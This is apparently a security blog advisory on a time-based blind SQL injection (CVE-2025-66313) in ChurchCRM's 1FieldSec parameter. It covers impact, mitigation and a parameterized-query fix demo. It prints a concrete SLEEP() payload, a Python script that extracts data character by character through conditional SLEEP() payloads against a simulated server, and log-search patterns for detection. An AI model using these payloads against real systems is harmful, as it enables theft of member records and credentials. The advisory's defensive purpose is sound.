
CVE-2025-66313: Critical Blind SQL Injection Found in ChurchCRM!

Overview

CVE-2025-66313 identifies a time-based blind SQL injection vulnerability in ChurchCRM, an open-source church management system. It affects versions 6.2.0 and earlier and resides in the handling of the 1FieldSec parameter. An attacker can inject SQL into that parameter, in particular a call to the SLEEP() function, and produce a measurable server-side delay of their choosing. A delay that tracks the requested sleep time confirms that the supplied value is concatenated directly into a SQL query rather than passed as a bound parameter.

Technical Details

The root cause is improper handling of user-supplied input in the ChurchCRM application: the value of the 1FieldSec parameter reaches the database query without parameterization or sanitization, so SQL syntax inside it is executed as part of the query. In a time-based blind injection the attacker never sees query results; the only feedback is response time. Wrapping SLEEP() in a condition, for example IF(<condition>, SLEEP(5), 0), turns each request into a yes/no question about the database, and the answer is read from whether the response is delayed. Repeating this over characters and positions lets an attacker reconstruct table names, column names and stored values, one bit at a time.

For example, a malicious user might craft a request containing a payload similar to: 1FieldSec=1' AND SLEEP(5) -- . Note the trailing space after the two dashes: MySQL only treats -- as a comment start when it is followed by whitespace. If the server pauses for about 5 seconds on this request but answers a benign value promptly, the injection is confirmed; checking against a baseline request, and varying the sleep value, rules out a server that is simply slow.
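The following is an added example, not code from the page or from ChurchCRM, showing how the timing signal above is used in practice: first the confirmation step with the page's own payload, then extraction of a value by binary search over ASCII codes using a conditional SLEEP(). The "server" is a constructed stand-in that honours SLEEP() the way a concatenated MySQL query would; the column name password and the secret value are invented for the demo, and sleep times are scaled down so it runs in well under a second.

```python
import re
import time

# Constructed stand-in for a column the attacker wants to read through the
# timing side channel (invented demo data, not anything from ChurchCRM).
SECRET = "s3cret"

# Sleep seconds requested by a payload are scaled down so the demo finishes
# quickly; a real server honours SLEEP(n) literally.
SCALE = 0.02


def fake_server(field_sec: str) -> float:
    """Simulate the vulnerable endpoint: the parameter is concatenated into a
    WHERE clause, so SQL inside it is executed. Returns seconds elapsed."""
    start = time.perf_counter()
    sleep_for = 0
    # Conditional form used for extraction:
    #   IF(ASCII(SUBSTRING(col,pos,1))>n,SLEEP(s),0)
    m = re.search(
        r"IF\(ASCII\(SUBSTRING\(\w+,(\d+),1\)\)>(\d+),SLEEP\((\d+)\),0\)", field_sec)
    if m:
        pos, threshold, secs = (int(g) for g in m.groups())
        ch = SECRET[pos - 1] if pos <= len(SECRET) else "\0"  # past the end -> ASCII 0
        if ord(ch) > threshold:
            sleep_for = secs
    else:
        # Unconditional form from the write-up: 1' AND SLEEP(5)--
        m = re.search(r"SLEEP\((\d+)\)", field_sec)
        if m:
            sleep_for = int(m.group(1))
    time.sleep(sleep_for * SCALE)
    return time.perf_counter() - start


def delayed(payload: str, sleep_s: int) -> bool:
    """Timing oracle: did the request take at least half the requested sleep?
    Half the expected delay keeps ordinary latency jitter from producing
    false positives while still tolerating a slow server."""
    return fake_server(payload) >= sleep_s * SCALE / 2


def confirm_injection(sleep_s: int = 5) -> bool:
    """The page's confirmation step, done properly: a benign value must come
    back fast AND the SLEEP payload must be delayed. Without the baseline a
    slow server alone would look like a positive result."""
    baseline = delayed("1", sleep_s)
    injected = delayed(f"1' AND SLEEP({sleep_s})-- ", sleep_s)
    return injected and not baseline


def char_at(pos: int, column: str = "password", sleep_s: int = 1) -> int:
    """Recover one character's ASCII code with a binary search of yes/no
    questions: 7 requests per character instead of up to 127."""
    lo, hi = -1, 127  # invariant: lo < code <= hi
    while hi - lo > 1:
        mid = (lo + hi) // 2
        payload = (f"1' AND IF(ASCII(SUBSTRING({column},{pos},1))>{mid},"
                   f"SLEEP({sleep_s}),0)-- ")
        if delayed(payload, sleep_s):
            lo = mid
        else:
            hi = mid
    return hi


def extract(column: str = "password", max_len: int = 32) -> str:
    """Read a string one character at a time; ASCII 0 marks the end."""
    out = []
    for pos in range(1, max_len + 1):
        code = char_at(pos, column)
        if code == 0:
            break
        out.append(chr(code))
    return "".join(out)


if __name__ == "__main__":
    print("injection confirmed:", confirm_injection())
    print("recovered value:", extract())
```

The oracle compares against half the requested delay rather than the full value; on a real target you would also repeat each question a few times and take the median, because network jitter is the main source of wrong bits in time-based extraction.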

CVSS Analysis

The CVSS score and severity for CVE-2025-66313 are currently listed as N/A, most likely because a score has not yet been assigned and published. Given that an unauthenticated-looking SQL injection of this kind can expose and potentially alter the contents of the database, it is reasonable to expect a High or Critical rating once one is assigned. The blind nature of the injection makes exploitation slower and noisier than a classic error- or union-based injection, since every bit of data costs a request and a delay, but common tooling automates the process, so it should not be treated as a mitigating factor.

Possible Impact

Successful exploitation of this vulnerability can lead to severe consequences, including:

  • Data Exfiltration: Sensitive information such as member details (names, addresses, contact information, financial records) and stored credential hashes could be extracted from the database, slowly but reliably, through the timing channel.
  • Data Modification: If the injection point permits statements beyond the original SELECT (for example, stacked queries), attackers could alter membership records, financial contributions, or other critical information. A time-based injection inside a read query does not provide this by itself.
  • Account Takeover: The more common path is extracting administrator password hashes and cracking them offline; where writes are possible, an attacker could also change a stored credential directly.
  • Service Disruption: Heavy use of SLEEP() or similarly expensive functions ties up database connections and can degrade or halt normal operation of the ChurchCRM system.

Mitigation or Patch Steps

The recommended mitigation is to upgrade ChurchCRM to a release later than 6.2.0, which incorporates the fix for this vulnerability. The fix is available in the commit referenced below. Specifically:

  • Upgrade ChurchCRM: Ensure you are running the latest version of ChurchCRM to benefit from the patch that addresses this vulnerability.
  • Until you can upgrade: search web server access logs for requests whose 1FieldSec value contains SLEEP( or BENCHMARK(, and consider blocking such values at a reverse proxy or WAF. This reduces exposure and gives you a detection signal, but it is not a substitute for the patch.
  • Limit the blast radius: run ChurchCRM with a database account that holds only the privileges the application needs, so an injection cannot reach other schemas or write where it should only read.
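As an added example, not ChurchCRM's own code (the application is written in PHP, where the same contrast applies to PDO prepared statements), the block below puts the concatenation pattern behind this class of bug next to its parameterized form, using an in-memory SQLite table with three made-up rows. SQLite has no SLEEP() function, so the page's time-based payload surfaces here as a parser error rather than a delay; the point is which version lets the payload reach the SQL parser at all. The table and column names are assumptions for the demo.

```python
import sqlite3

# Constructed sample rows (demo data only, nothing from a real deployment).
ROWS = [(1, "Ada"), (2, "Grace"), (3, "Linus")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE person (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO person VALUES (?, ?)", ROWS)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, field_sec: str) -> list:
    """The pattern behind the CVE: the request parameter is spliced into the
    SQL text, so quotes, operators and function calls in it are parsed as SQL."""
    sql = "SELECT id, name FROM person WHERE id = '" + field_sec + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, field_sec: str) -> list:
    """The fix: the statement is compiled with a placeholder and the value is
    bound afterwards, so the parameter can only ever be a value, never SQL."""
    return conn.execute(
        "SELECT id, name FROM person WHERE id = ?", (field_sec,)).fetchall()


def classify(fn, conn: sqlite3.Connection, field_sec: str):
    """Run one lookup; return the row count, or the error the payload caused."""
    try:
        return len(fn(conn, field_sec))
    except sqlite3.OperationalError as exc:
        return f"error: {exc}"


def demo() -> dict:
    """Feed a benign value and two injection payloads to both lookups and
    report (vulnerable outcome, parameterized outcome) for each."""
    conn = make_db()
    payloads = {
        "benign": "1",
        "tautology": "1' OR '1'='1",
        "time-based": "1' AND SLEEP(5)-- ",
    }
    return {name: (classify(lookup_vulnerable, conn, p),
                   classify(lookup_safe, conn, p))
            for name, p in payloads.items()}


if __name__ == "__main__":
    for name, (vuln, safe) in demo().items():
        print(f"{name:11} vulnerable={vuln!r:40} parameterized={safe!r}")
```

With concatenation the tautology payload returns every row and the SLEEP() payload is handed to the SQL engine (here an unknown-function error; on MySQL, a five-second pause). With a bound parameter both payloads are just strings that match no id, and the benign value still works.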

References

Cybersecurity specialist and founder of Gowri Shankar Infosec - a professional blog dedicated to sharing actionable insights on cybersecurity, data protection, server administration, and compliance frameworks including SOC 2, PCI DSS, and GDPR.
